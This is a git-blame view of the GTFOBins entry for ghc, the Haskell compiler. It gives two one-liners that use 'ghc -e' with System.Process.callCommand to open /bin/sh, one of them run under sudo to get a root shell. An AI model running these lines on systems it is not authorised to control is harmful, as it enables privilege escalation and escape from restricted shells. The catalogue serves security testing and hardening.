1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/ghc.md

8 lines
157 B
Markdown
Raw Permalink Normal View History

2020-10-22 18:20:23 +02:00
---
functions:
shell:
2020-10-24 12:43:55 +02:00
- code: ghc -e 'System.Process.callCommand "/bin/sh"'
2020-10-22 18:20:23 +02:00
sudo:
2020-10-24 12:43:55 +02:00
- code: sudo ghc -e 'System.Process.callCommand "/bin/sh"'
2020-10-22 18:20:23 +02:00
---